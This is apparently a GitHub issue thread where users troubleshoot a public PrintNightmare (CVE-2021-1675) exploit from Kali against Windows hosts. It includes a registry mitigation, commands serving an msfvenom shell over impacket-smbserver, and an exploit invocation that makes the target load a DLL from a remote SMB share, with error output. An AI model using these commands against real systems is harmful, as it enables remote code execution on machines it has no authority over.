Open oflavioc opened 3 years ago
Encountering exactly the same issue (testing from Kali to W10 client). Any thoughts? P.S. remote access to print spooler can be blocked easily by setting REG_DWORD RegisterSpoolerRemoteRpcEndpoint to 2 under hive HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers
I was able to solved this problem by moving the shell generated by msfvenom to /home/kali/Desktop.
Then i configure the smbserver with the directory, as seen below
impacket-smbserver share /home/kali/Desktop -smb2support
I hope this work for you too
I was able to solved this problem by moving the shell generated by msfvenom to /home/kali/Desktop.
Then i configure the smbserver with the directory, as seen below
impacket-smbserver share /home/kali/Desktop -smb2support
I hope this work for you too
i tried your solution but it seems not working for me. any other ideas !
Yes, I meet this issue too. But when I ask professional pentest he said that it had been patched
Yes, I meet this issue too. But when I ask professional pentest he said that it had been patched
hi so if its patched would i not be able to run the exploit at all???
Facing the error below:
┌──(kali㉿kali)-[~/CVE-2021-1675] └─$ python3 CVE-2021-1675.py server.local/user:password@192.168.10.116 '\192.168.10.215\print.dll' 1 ⨯ [*] Connecting to ncacn_np:192.168.10.116[\PIPE\spoolss] [+] Bind OK [-] Failed to enumerate remote pDriverPath RPRN SessionError: unknown error code: 0x8001011b
Does that mean the server is not vulnerable?